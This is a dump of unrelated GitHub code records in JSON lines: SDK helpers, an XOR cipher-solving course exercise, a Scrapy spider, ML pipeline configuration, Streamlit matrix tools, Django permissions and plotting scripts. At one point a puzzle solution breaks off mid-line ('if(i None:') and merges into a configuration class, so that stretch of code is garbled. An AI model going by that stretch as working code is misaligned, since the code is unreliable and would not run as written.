result += 'winsdk_lib_path={}\\n'.format(self.lib_path)\n\n return result\n\ndef get_version_list():\n \"\"\"\n Return the list of all WinSDK 10 installed in local.\n Note: unfortunately I don't know how to programatically find WinSDK path,\n so I am testing the default 'Program Files's path.\n \"\"\"\n if not default_install_path.exists() or not default_install_path.is_dir():\n return set()\n\n include = default_install_path / 'Include'\n include_versions = set()\n for f in include.iterdir():\n include_versions.add(f.name)\n\n include = default_install_path / 'Lib'\n lib_versions = set()\n for f in include.iterdir():\n lib_versions.add(f.name)\n\n return include_versions & lib_versions\n\ndef get_latest_version():\n \"\"\"\n Return the most recent version of WinSDK installed in local.\n \"\"\"\n versions = get_version_list()\n \n if len(versions) == 0:\n return None\n\n expanded_versions = [x.split('.') for x in versions]\n sorted_versions = ['.'.join(k) for k in sorted(expanded_versions, reverse=True)]\n \n assert(len(sorted_versions) > 0)\n\n return sorted_versions[0]\n\ndef get_latest_config():\n return WinSdkConfig(get_latest_version())\n\ndef get_config(version):\n return WinSdkConfig(version)\n\ndef test_print():\n print(get_latest_config())\n","repo_name":"Dragnalith/build_system_experiment","sub_path":"project/build/tool/gbuild/sdk/winsdk.py","file_name":"winsdk.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"841873551","text":"import base64\nimport binhex\nimport os\nimport xortool\n\n\"\"\"\nxortool -x -l 5 -c \"0x20\" mbxor_cipher.txt --> to give key\n\"\"\"\n\ndef solve():\n with open(\"mbxor_cipher.txt\") as cipher:\n line = cipher.readline()\n hex_line = bytearray.fromhex(line)\n x = xor(hex_line)\n print(x)\n\n\ndef xor(line):\n result = \"\"\n key = [0x57, 0x47, 0x75, 0x58, 0x6e]\n for idx, c in enumerate(line):\n result += chr(ord(chr(c)) ^ key[idx % 5])\n return result\n\n\nkey = \"WGuXn\"\n\nsolve()","repo_name":"iownthishuman/pythonProject","sub_path":"offsec-course/mbxor.py","file_name":"mbxor.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21560191773","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom jianshu.items import JianshuItem\n\nclass JsspiderSpider(CrawlSpider):\n name = 'jsspider'\n allowed_domains = ['jianshu.com']\n start_urls = ['https://www.jianshu.com/']\n\n rules = (\n Rule(LinkExtractor(allow=r'.*/p/[0-9a-z]{12}.*'), callback='parse_detail', follow=True),\n )\n def parse_detail(self, response):\n # 获取文章的标题\n title = response.xpath('//h1[@class=\"title\"]/text()').get()\n # 获取文章作者的头像地址\n avatar = response.xpath('//a[@class=\"avatar\"]/img/@src').get()\n # 获取文章作者\n author = response.xpath('//span[@class=\"name\"]/a/text()').get()\n # 获取文章的发表时间\n pub_time = response.xpath('//span[@class=\"publish-time\"]/text()').get()\n # 文章的存储地址\n orginal_id = response.url\n article = (orginal_id.split(\"?\")[0]).split(\"/\")[-1]\n # 文章的内容部分\n content = response.xpath(\"//div[@class='show-content-free']\").get()\n # 文章的字数\n word_count = response.xpath('//span[@class=\"wordage\"]/text()').get().split(\" \")[1]\n # 喜欢的人数\n like_count = response.xpath('//span[@class=\"likes-count\"]/text()').get().split(\" \")[1]\n # 阅读的数量\n read_count = response.xpath(\"//span[@class='views-count']/text()\").get().split(\" \")[1]\n # 属于的专题\n subject = \",\".join(response.xpath('//div[@class=\"include-collection\"]/a/div/text()').getall())\n\n # 将文章的所有的信息,返回到item中\n item = JianshuItem(\n title=title,\n avatar=avatar,\n author=author,\n pub_time=pub_time,\n orginal_id=orginal_id,\n article=article,\n content=content,\n word_count=word_count,\n like_count=like_count,\n read_count=read_count,\n subject=subject\n )\n yield item\n\n\n\n\n","repo_name":"franckisses/python_spider","sub_path":"spider_framework/jianshu/jianshu/spiders/jsspider.py","file_name":"jsspider.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13910065632","text":"def solution(cards1, cards2, goal):\n# answer = 'Yes'\n# wordIndex1 = []\n# wordIndex2 = []\n \n# for word in goal:\n# try:\n# wordIndex1.append(cards1.index(word))\n# except ValueError:\n# continue\n# try: \n# wordIndex2.append(cards2.index(word)) \n# except ValueError:\n# continue\n \n# if(sorted(wordIndex1) != wordIndex1):\n# answer = 'No'\n# if(sorted(wordIndex2) != wordIndex2):\n# answer = 'No'\n \n answer = 'Yes'\n wordList = []\n \n i=0\n j=0\n k=0\n \n for word in goal:\n if(i None:\n try:\n self.config: ConfigBox = read_yaml(config)\n self.current_time_stamp: str = CURRENT_TIME_STAMP\n self.training_pipeline_config: TrainingPipelineConfig = self.get_training_pipeline_config\n self.artifact_dir: Path = self.training_pipeline_config.artifacts_root\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n\n @property\n def get_training_pipeline_config(self) -> TrainingPipelineConfig:\n try:\n training_pipeline: ConfigBox = self.config[TRAINING_PIPELINE_CONFIG_KEY]\n artifact_dir = Path(os.path.join(ROOT_DIR, training_pipeline[TRAINING_PIPELINE_ARTIFACT_DIR_KEY]\n ))\n training_pipeline_name = training_pipeline[TRAINING_PIPELINE_NAME_KEY]\n\n training_pipeline_config = TrainingPipelineConfig(\n artifacts_root=artifact_dir,\n training_pipeline_name=training_pipeline_name\n )\n\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n return training_pipeline_config\n\n def get_data_ingestion_config(self) -> DataIngestionConfig:\n try:\n data_ingestion_artifact_dir = Path(os.path.join(self.artifact_dir, DATA_INGESTION_ARTIFACT_DIR_KEY))\n data_ingestion_info: ConfigBox = self.config[DATA_INGESTION_CONFIG_KEY]\n dataset_download_url: ConfigBox = data_ingestion_info[DATA_INGESTION_URL_KEY]\n zip_dir = Path(os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_ZIP_DIR_KEY]))\n raw_data_dir = Path(\n os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_RAW_DATA_DIR_KEY]))\n ingested_data_dir = Path(\n os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_INGESTED_DIR_KEY]))\n ingested_train_dir = Path(\n os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_TRAIN_DIR_KEY]))\n ingested_test_dir = Path(\n os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_TEST_DIR_KEY]))\n stratify: str = data_ingestion_info[DATA_INGESTION_STRATIFY_COL_KEY]\n test_size: float = data_ingestion_info[DATA_INGESTION_TEST_SIZE_KEY]\n\n data_ingestion_config = DataIngestionConfig(\n source_url=dataset_download_url,\n raw_data_dir=raw_data_dir,\n zip_dir=zip_dir,\n ingested_dir=ingested_data_dir,\n ingested_train_dir=ingested_train_dir,\n ingested_test_dir=ingested_test_dir,\n stratify=stratify,\n test_size=test_size,\n )\n\n logging.info(f\"Data ingestion config : {data_ingestion_config}\")\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n\n return data_ingestion_config\n\n def get_data_validation_config(self) -> DataValidationConfig:\n try:\n data_validation_artifacts_dir = Path(\n os.path.join(self.artifact_dir, DATA_VALIDATION_ARTIFACT_DIR_KEY, self.current_time_stamp))\n data_validation_config_info: ConfigBox = self.config[DATA_VALIDATION_CONFIG_KEY]\n schema_file_name: str = data_validation_config_info[DATA_SCHEMA_FILE_NAME_KEY]\n schema_file_path: Path = Path(\n os.path.join(DATA_SCHEMA_DIR, data_validation_config_info[DATA_SCHEMA_FILE_NAME_KEY]))\n report_file_name: str = data_validation_config_info[DATA_VALIDATION_REPORT_FILE_NAME_KEY]\n report_file_path = Path(os.path.join(data_validation_artifacts_dir, report_file_name))\n\n data_validation_config = DataValidationConfig(\n schema_file_name=schema_file_name,\n schema_file_path=schema_file_path,\n report_file_name=report_file_name,\n report_file_path=report_file_path,\n )\n\n logging.info(f\"logging data validation config: {data_validation_config}\")\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n return data_validation_config\n\n def get_data_transformation_config(self) -> DataTransformationConfig:\n try:\n data_transformation_config_info: ConfigBox = self.config[DATA_TRANSFORMATION_CONFIG_KEY]\n data_transformation_artifacts_dir = Path(\n os.path.join(self.artifact_dir, data_transformation_config_info[DATA_TRANSFORMATION_ARTIFACTS_DIR_KEY]))\n transformed_train_dir = Path(os.path.join(data_transformation_artifacts_dir,\n data_transformation_config_info[DATA_TRANSFORMED_TRAIN_DIR_KEY]))\n transformed_test_dir = Path(os.path.join(data_transformation_artifacts_dir,\n data_transformation_config_info[DATA_TRANSFORMED_TEST_DIR_KEY]))\n preprocessing_object_file_path = Path(os.path.join(data_transformation_artifacts_dir,\n data_transformation_config_info[\n DATA_TRANSFORMATION_PREPROCESSING_DIR_KEY],\n data_transformation_config_info[\n DATA_TRANSFORMATION_PREPROCESSING_OBJECT_FILE_NAME_KEY]))\n imputer_sampler_object_file_path = Path(os.path.join(data_transformation_artifacts_dir,\n data_transformation_config_info[\n DATA_TRANSFORMATION_PREPROCESSING_DIR_KEY],\n data_transformation_config_info[\n DATA_TRANSFORMATION_IMPUTER_SAMPLER_OBJECT_FILE_NAME_KEY]))\n\n data_transformation_config = DataTransformationConfig(\n transformed_dir=data_transformation_artifacts_dir,\n transformed_train_dir=transformed_train_dir,\n transformed_test_dir=transformed_test_dir,\n preprocessing_object_file_path=preprocessing_object_file_path,\n imputer_sampler_object_file_path=imputer_sampler_object_file_path,\n )\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n logging.info(f\"Data transformation config: {data_transformation_config}\")\n return data_transformation_config\n\n def get_model_trainer_config(self) -> ModelTrainerConfig:\n try:\n model_trainer_artifacts_dir = Path(\n os.path.join(self.artifact_dir, MODEL_TRAINER_ARTIFACTS_DIR_KEY, self.current_time_stamp))\n\n model_trainer_config_info: ConfigBox = self.config[MODEL_TRAINER_CONFIG_KEY]\n\n base_accuracy: ConfigBox = model_trainer_config_info[MODEL_TRAINER_BASE_SCORE_KEY]\n trained_model_file_path = Path(\n os.path.join(model_trainer_artifacts_dir, model_trainer_config_info[MODEL_TRAINED_DIR_KEY],\n model_trainer_config_info[MODEL_TRAINED_FILE_NAME_KEY]))\n model_config_file_path = Path(os.path.join(MODEL_TRAINER_CONFIG_DIR, model_trainer_config_info[\n MODEL_TRAINER_MODEL_CONFIG_FILE_NAME_KEY]))\n threshold_diff_train_test_acc = model_trainer_config_info[MODEL_TRAINED_DIFF_TRAIN_TEST_ACC_KEY]\n\n model_trainer_config = ModelTrainerConfig(\n trained_model_file_path=trained_model_file_path,\n base_score=base_accuracy,\n model_config_file_path=model_config_file_path,\n threshold_diff_train_test_acc=threshold_diff_train_test_acc\n )\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n logging.info(f\"Model trainer config : {model_trainer_config}\")\n\n return model_trainer_config\n\n def get_model_evaluation_config(self) -> ModelEvaluationConfig:\n try:\n model_evaluation_config_info: ConfigBox = self.config[MODEL_EVALUATION_CONFIG_KEY]\n artifact_dir: Path = Path(\n os.path.join(self.artifact_dir, model_evaluation_config_info[MODEL_EVALUATION_ARTIFACTS_DIR_KEY]))\n\n model_evaluation_file_path = Path(\n os.path.join(artifact_dir, model_evaluation_config_info[MODEL_EVALUATION_FILE_NAME_KEY]))\n\n response = ModelEvaluationConfig(\n model_evaluation_file_path=model_evaluation_file_path,\n time_stamp=self.current_time_stamp,\n mlflow_uri=None)\n\n logging.info(f\"Model Evaluation config: {response}\")\n\n return response\n\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n\n def get_model_pusher_config(self) -> ModelPusherConfig:\n\n try:\n model_pusher_config_info: ConfigBox = self.config[MODEL_PUSHER_CONFIG_KEY]\n\n export_dir_path = Path(\n os.path.join(self.artifact_dir, model_pusher_config_info[MODEL_PUSHER_EXPORT_DIR_KEY]),\n self.current_time_stamp)\n saved_models_directory = Path(\n os.path.join(self.artifact_dir, model_pusher_config_info[MODEL_PUSHER_EXPORT_DIR_KEY]))\n\n model_pusher_config = ModelPusherConfig(\n model_export_dir=export_dir_path,\n saved_models_directory=saved_models_directory\n )\n\n logging.info(f\"Logging model pusher: {model_pusher_config}\")\n\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n\n return model_pusher_config\n","repo_name":"ArunKhare/FraudDetection","sub_path":"src/fraudDetection/config/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":10479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38349667888","text":"import streamlit as st\r\nimport numpy as np\r\n\r\n\r\ndef multiply_matrices(matrix1, matrix2):\r\n result = np.dot(matrix1, matrix2)\r\n return result\r\n\r\ndef main():\r\n st.title(\"Perkalian Matriks 2x2\")\r\n \r\n # Input matriks pertama\r\n st.subheader(\"Matriks Pertama\")\r\n matrix1 = []\r\n for i in range(2):\r\n row = []\r\n for j in range(2):\r\n value = st.number_input(f\"Masukkan nilai matriks1[{i+1}][{j+1}]\", key=f\"matrix1_{i}_{j}\")\r\n row.append(value)\r\n matrix1.append(row)\r\n \r\n # Input matriks kedua\r\n st.subheader(\"Matriks Kedua\")\r\n matrix2 = []\r\n for i in range(2):\r\n row = []\r\n for j in range(2):\r\n value = st.number_input(f\"Masukkan nilai matriks2[{i+1}][{j+1}]\", key=f\"matrix2_{i}_{j}\")\r\n row.append(value)\r\n matrix2.append(row)\r\n \r\n # Tombol hitung\r\n if st.button(\"Hitung\"):\r\n result = multiply_matrices(matrix1, matrix2)\r\n st.subheader(\"Hasil Perkalian\")\r\n st.write(result)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\ndef determinant_2x2(matrix):\r\n det = matrix[0][0] * matrix[1][1] - matrix[0][1] * matrix[1][0]\r\n return det\r\n\r\ndef main():\r\n st.title(\"Determinan Matriks 2x2\")\r\n st.write(\"Masukkan nilai elemen matriks 2x2:\")\r\n\r\n matrix = []\r\n for i in range(2):\r\n row = []\r\n for j in range(2):\r\n value = st.number_input(f\"Masukkan elemen matriks [{i}][{j}]:\", key=f\"matrix[{i}][{j}]\")\r\n row.append(value)\r\n matrix.append(row)\r\n\r\n if st.button(\"Hitung Determinan\"):\r\n det = determinant_2x2(matrix)\r\n st.success(f\"Determinan matriks: {det}\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\ndef inverse_matrix(matrix):\r\n det = matrix[0, 0] * matrix[1, 1] - matrix[0, 1] * matrix[1, 0]\r\n if det == 0:\r\n return None\r\n else:\r\n inv_matrix = np.zeros_like(matrix)\r\n inv_matrix[0, 0] = matrix[1, 1] / det\r\n inv_matrix[0, 1] = -matrix[0, 1] / det\r\n inv_matrix[1, 0] = -matrix[1, 0] / det\r\n inv_matrix[1, 1] = matrix[0, 0] / det\r\n return inv_matrix\r\n\r\ndef main():\r\n st.title(\"Invers Matriks 2x2\")\r\n \r\n st.write(\"Masukkan elemen-elemen matriks:\")\r\n a = st.number_input(\"A[0, 0]\", value=0.0)\r\n b = st.number_input(\"A[0, 1]\", value=0.0)\r\n c = st.number_input(\"A[1, 0]\", value=0.0)\r\n d = st.number_input(\"A[1, 1]\", value=0.0)\r\n \r\n matrix = np.array([[a, b], [c, d]])\r\n \r\n if st.button(\"Hitung Invers\"):\r\n inv_matrix = inverse_matrix(matrix)\r\n if inv_matrix is None:\r\n st.error(\"Determinan matriks adalah 0. Matriks tidak dapat diinvers.\")\r\n else:\r\n st.success(\"Invers matriks:\")\r\n st.write(inv_matrix)\r\n \r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Anissyaifatul/streamlit-anis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39351147394","text":"from pathlib import Path\nfrom typing import NamedTuple\n\nfrom ir_measures import Measure\nfrom pandas import DataFrame, merge, Series\nfrom pyterrier import init, started\nfrom pyterrier.io import read_qrels\nfrom pyterrier.pipelines import Experiment\nfrom pyterrier.transformer import Transformer\nfrom tqdm.auto import tqdm\n\nfrom stare.config import CONFIG, RunConfig\nfrom stare.modules.runs_loader import RunLoader\nfrom stare.modules.stance_filter import StanceFilter\nfrom stare.modules.stance_randomizer import StanceF1Randomizer\nfrom stare.modules.stance_reranker import StanceReranker\nfrom stare.modules.stance_tagger import StanceTagger\nfrom stare.modules.text_loader import TextLoader\nfrom stare.modules.topics_loader import parse_topics\n\n\nclass NamedPipeline(NamedTuple):\n names: list[str]\n pipeline: Transformer\n\n @property\n def name(self):\n return \" + \".join(self.names)\n\n\ndef _run(\n run_file_path: Path, run_config: RunConfig\n) -> NamedPipeline:\n team_directory_path = run_file_path.parent.parent\n\n pipeline = RunLoader(run_file_path)\n names = [f\"{team_directory_path.stem} {pipeline.name}\"]\n\n # Load text contents.\n pipeline = ~(\n pipeline >>\n TextLoader()\n )\n\n # Tag stance.\n if run_config.stance_tagger_cutoff is None:\n pipeline = ~(\n ~(\n pipeline >>\n run_config.stance_tagger\n ) >>\n StanceFilter(run_config.stance_tagger_threshold)\n )\n elif run_config.stance_tagger_cutoff > 0:\n # noinspection PyTypeChecker\n pipeline = (\n ~(\n ~(\n pipeline %\n run_config.stance_tagger_cutoff >>\n run_config.stance_tagger\n ) >>\n StanceFilter(run_config.stance_tagger_threshold)\n ) ^\n pipeline\n )\n\n if run_config.stance_tagger != StanceTagger.ORIGINAL:\n name = run_config.stance_tagger.value\n if run_config.stance_tagger_threshold > 0:\n name += f\"({run_config.stance_tagger_threshold:.2f})\"\n if run_config.stance_tagger_cutoff is not None:\n name += f\"@{run_config.stance_tagger_cutoff}\"\n names.append(name)\n\n # Randomize stance.\n if run_config.stance_randomization_cutoff is None:\n pipeline = ~(\n pipeline >>\n StanceF1Randomizer(\n max_f1=run_config.stance_randomization_target_f1,\n seed=run_config.stance_randomization_seed,\n )\n )\n elif run_config.stance_randomization_cutoff > 0:\n # noinspection PyTypeChecker\n pipeline = (\n ~(\n pipeline %\n run_config.stance_randomization_cutoff >>\n StanceF1Randomizer(\n max_f1=run_config.stance_randomization_target_f1,\n seed=run_config.stance_randomization_seed,\n )\n ) ^\n pipeline\n )\n\n if run_config.stance_randomization_target_f1 < 1:\n name = \"randomize\"\n name += f\"(F1<={run_config.stance_randomization_target_f1:.2f})\"\n if run_config.stance_randomization_cutoff is not None:\n name += f\"@{run_config.stance_randomization_cutoff}\"\n names.append(name)\n\n # Re-rank for effectiveness.\n if run_config.stance_reranker_cutoff is None:\n pipeline = ~(\n pipeline >>\n run_config.stance_reranker\n )\n elif run_config.stance_reranker_cutoff > 0:\n # noinspection PyTypeChecker\n pipeline = (\n ~(\n pipeline %\n run_config.stance_reranker_cutoff >>\n run_config.stance_reranker\n ) ^\n pipeline\n )\n\n if (run_config.stance_reranker != StanceReranker.ORIGINAL and\n (run_config.stance_reranker_cutoff is None or\n run_config.stance_reranker_cutoff > 0)):\n name = run_config.stance_reranker.value\n if run_config.stance_reranker_cutoff is not None:\n name += f\"@{run_config.stance_reranker_cutoff}\"\n names.append(name)\n\n # Re-rank optimal.\n if run_config.optimal_reranker is None:\n pass\n elif run_config.optimal_reranker_cutoff is None:\n pipeline = ~(\n pipeline >>\n run_config.optimal_reranker\n )\n elif run_config.optimal_reranker_cutoff > 0:\n # noinspection PyTypeChecker\n pipeline = (\n ~(\n pipeline %\n run_config.optimal_reranker_cutoff >>\n run_config.optimal_reranker\n ) ^\n pipeline\n )\n\n if (run_config.optimal_reranker is not None and\n (run_config.optimal_reranker_cutoff is None or\n run_config.optimal_reranker_cutoff > 0)):\n name = run_config.optimal_reranker.value\n if run_config.optimal_reranker_cutoff is not None:\n name += f\"@{run_config.optimal_reranker_cutoff}\"\n names.append(name)\n\n return NamedPipeline(names, pipeline)\n\n\ndef _name_index(experiment: DataFrame) -> DataFrame:\n names = experiment[\"name\"].unique()\n name_index = {name: i + 1 for i, name in enumerate(names)}\n columns = experiment.columns.tolist()\n experiment[\"name_index\"] = experiment[\"name\"].map(name_index)\n columns.insert(1, \"name_index\")\n columns.remove(\"index\")\n return experiment[columns]\n\n\ndef _run_experiment(\n runs: list[NamedPipeline],\n topics: DataFrame,\n qrels: DataFrame,\n measures: list[Measure],\n) -> DataFrame:\n all_names: list[str] = [run.name for run in runs]\n all_systems: list[Transformer] = [run.pipeline for run in runs]\n if len(measures) == 0:\n return merge(\n topics[\"qid\"],\n Series(all_names, name=\"name\"),\n how=\"cross\",\n )\n return Experiment(\n retr_systems=all_systems,\n topics=topics,\n qrels=qrels,\n eval_metrics=measures,\n names=all_names,\n filter_by_qrels=CONFIG.filter_by_qrels,\n verbose=True,\n perquery=True,\n ).pivot_table(\n index=[\"qid\", \"name\"],\n columns=\"measure\",\n values=\"value\",\n aggfunc=\"first\",\n ).reset_index(\n drop=False\n )\n\n\ndef main() -> None:\n if not started():\n init()\n print(\"Load topics.\")\n topics: DataFrame = parse_topics()\n print(\"Load qrels.\")\n qrels_relevance: DataFrame = read_qrels(\n str(CONFIG.qrels_relevance_file_path.absolute())\n )\n qrels_quality: DataFrame = read_qrels(\n str(CONFIG.qrels_quality_file_path.absolute())\n )\n qrels_stance: DataFrame = read_qrels(\n str(CONFIG.qrels_stance_file_path.absolute())\n )\n qrels_stance[\"stance_label\"] = qrels_stance[\"label\"]\n\n max_teams = CONFIG.max_teams \\\n if CONFIG.max_teams is not None else None\n max_runs_per_team = CONFIG.max_runs_per_team \\\n if CONFIG.max_runs_per_team is not None else None\n run_file_paths: list[tuple[Path, RunConfig]] = [\n (run_file_path, run_config)\n for team_directory_path in\n sorted(\n CONFIG.runs_directory_path.iterdir()\n )[:max_teams]\n if team_directory_path.is_dir()\n for run_file_path in\n sorted(\n (team_directory_path / \"output\").iterdir()\n )[:max_runs_per_team]\n for run_config in CONFIG.runs\n ]\n # noinspection PyTypeChecker\n run_file_paths = tqdm(\n run_file_paths,\n desc=\"Load runs\",\n unit=\"path\"\n )\n runs: list[NamedPipeline] = [\n _run(run_file_path, run_config)\n for run_file_path, run_config in run_file_paths\n ]\n all_names: list[str] = [run.name for run in runs]\n\n print(\"Compute relevance effectiveness measures.\")\n effectiveness_relevance = _run_experiment(\n runs,\n topics,\n qrels_relevance,\n CONFIG.measures_relevance,\n )\n print(\"Compute quality effectiveness measures.\")\n effectiveness_quality = _run_experiment(\n runs,\n topics,\n qrels_quality,\n CONFIG.measures_quality,\n )\n effectiveness = effectiveness_relevance.merge(\n effectiveness_quality,\n on=[\"qid\", \"name\"],\n suffixes=(\" rel.\", \" qual.\")\n )\n\n experiment = effectiveness.reset_index(drop=False)\n\n def fix_name_order(df: DataFrame) -> DataFrame:\n df = df.set_index(\"name\")\n df = df.loc[all_names]\n return df.reset_index(drop=False)\n\n experiment = experiment.groupby(\"qid\").apply(fix_name_order)\n\n experiment[\"run\"] = experiment[\"name\"].apply(\n lambda name: name.split(\" + \")[0])\n\n # Number names.\n experiment = experiment \\\n .groupby(by=\"run\", sort=False, group_keys=False) \\\n .apply(_name_index) \\\n .reset_index(drop=True)\n\n # Export results.\n print(\"Export results.\")\n output_path = CONFIG.metrics_output_file_path\n if output_path.suffix == \".csv\":\n experiment.to_csv(output_path, index=False, float_format=\"%.3f\")\n if output_path.suffix == \".xlsx\":\n experiment.to_excel(output_path, index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"webis-de/argmining23-stance-aware-re-ranking","sub_path":"stare/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":9479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31843335809","text":"from django.urls import reverse\nfrom rest_framework import permissions\n\n\nclass PostPermissions(permissions.BasePermission):\n def has_permission(self, request, view):\n return request.user.is_authenticated\n\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return request.user.is_authenticated\n\n if request.stream.path == reverse(\"post_urls:posts-like\", args=[obj.id]):\n return request.user.is_authenticated\n\n if request.stream.path == reverse(\"post_urls:posts-to-approve\", args=[obj.id]):\n return request.user.role == 1\n\n return request.user == obj.user\n\n\nclass CommentPermissions(permissions.BasePermission):\n def has_permission(self, request, view):\n try:\n if request.method == 'POST' and request.data['user'] != request.user.id:\n return False\n except Exception:\n if request.method == 'POST':\n return False\n\n return request.user.is_authenticated\n\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n\n return request.user == obj.user\n","repo_name":"mateus-oliveira/friends-gallery-api","sub_path":"src/post/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14129193605","text":"def get_perturbed_connectivity_single_neuron(perturbed_X, perturb_freq, selected_neuron):\n \"\"\"\n Computes the connectivity matrix for the selected neuron using differences in means.\n\n Args:\n perturbed_X (np.ndarray): the perturbed dynamical system matrix of shape (n_neurons, timesteps)\n perturb_freq (int): the perturbation frequency (2 means perturb every other timestep)\n selected_neuron (int): the index of the neuron we want to estimate connectivity for\n\n Returns:\n estimated_connectivity (np.ndarray): estimated connectivity for the selected neuron, of shape (n_neurons,)\n \"\"\"\n neuron_perturbations = perturbed_X[selected_neuron, ::perturb_freq] # extract the perturbations of neuron 1\n all_neuron_output = perturbed_X[:, 1::perturb_freq] # extract the observed outcomes of all the neurons\n\n estimated_connectivity = np.zeros(n_neurons) # our stored estimated connectivity matrix\n\n for neuron_idx in range(n_neurons):\n selected_neuron_output = all_neuron_output[neuron_idx, :]\n one_idx = np.argwhere(neuron_perturbations == 1)\n zero_idx = np.argwhere(neuron_perturbations == 0)\n\n difference_in_means = np.mean(selected_neuron_output[one_idx]) - np.mean(selected_neuron_output[zero_idx])\n\n estimated_connectivity[neuron_idx] = difference_in_means\n\n return estimated_connectivity\n\n# Initialize the system\nn_neurons = 6 \ntimesteps = 5000 # Simulate for 5000 timesteps.\nperturb_freq = 2 # perturb the system every other time step\n\n# Simulate our perturbed dynamical system for the given amount of time\nperturbed_X = simulate_neurons_perturb(A, timesteps, perturb_freq=perturb_freq)\n\n# we'll measure the connectivity of neuron 1\nselected_neuron = 1\nestimated_connectivity = get_perturbed_connectivity_single_neuron(perturbed_X, perturb_freq, selected_neuron)\n\n#Now plot\nwith plt.xkcd():\n fig, axs = plt.subplots(1,2, figsize=(10,5))\n plot_connectivity_matrix(np.expand_dims(estimated_connectivity, axis=1), ax=axs[0])\n axs[0].set(title=\"Estimated connectivity\", ylabel=\"Neuron\")\n plot_connectivity_matrix(A[:, [selected_neuron]], ax=axs[1])\n axs[1].set(title=\"True connectivity\")","repo_name":"ddinesan/Neuroscience","sub_path":"tutorials/W3D3_NetworkCausality/solutions/W3D3_Tutorial1_Solution_1ab9b01c.py","file_name":"W3D3_Tutorial1_Solution_1ab9b01c.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33606294716","text":"# Regular Way\na=[2,4,6,8]\nb=[3,6,9]\nresult1=[]\nresult2=[]\n\nfor i in a:\n if i in b:\n result1.append(i)\n\nprint(\"Using Normal Way : \")\nprint(result1)\n\nprint(\"Using List Comprehension : \")\nresult2 = [i for i in a if i in b]\nprint(result2)\n","repo_name":"testpushkarchauhan92/bharath_python_core_advanced","sub_path":"Lesson10ListComprehension/P004CommonElementsinTwoList.py","file_name":"P004CommonElementsinTwoList.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69841462508","text":"import umap\nfrom sklearn.datasets import fetch_openml\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport argparse\n\n\nparser = argparse.ArgumentParser(description='Evaluates an OOD Detector',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--logits', default=0, type=int)\nparser.add_argument('--pro', default=0, type=int)\nparser.add_argument('--pro_length', default=0, type=int)\nparser.add_argument('--name', default=1., type=str)\nargs = parser.parse_args()\n\nsns.set(context=\"paper\", style=\"white\")\noutlier_number = 100\nnum_classes_consider = 100\n\ndata_token = np.load('./text_features.npy')\ndata = np.load('./data_clip.npy')\nnumber_class = []\nfixed_number = 50\nfor i in range(num_classes_consider):\n if i == 0:\n data_preprocess = data[i*50:i*50+50]\n else:\n data_preprocess = np.concatenate((data_preprocess, data[i*50:i*50+50]), 0)\n number_class.append(fixed_number)\n\ndata_preprocess = np.array(data_preprocess).reshape(-1, 512)\n\ntargets = []\n\n\ndata_preprocess = torch.from_numpy(data_preprocess)\n# breakpoint()\n\ndata_preprocess = torch.cat([data_preprocess,\n torch.from_numpy(data_token)[:num_classes_consider]],0).numpy()\n# # breakpoint()\n# data_preprocess = torch.cat([data_preprocess,\n# F.normalize(torch.from_numpy(np.load('./outlier_cosine_vmf_select_100_new_version.npy').reshape(-1, 768)),\n# p=2, dim=-1)[:num_classes_consider*outlier_number]]).numpy()\n\n# length = []\n# for index in range(5):\n# data_preprocess = torch.cat([data_preprocess,\n# F.normalize(torch.from_numpy(np.load(str(index)+'.npy')),p=2, dim=-1)])\n# length.append(np.load(str(index)+'.npy').shape[0])\n#\n# data_preprocess = data_preprocess.numpy()\n\n\nprint(data_preprocess.shape)\n# breakpoint()\nfrom sklearn.manifold import TSNE\nembedding1 = TSNE(n_components=2, 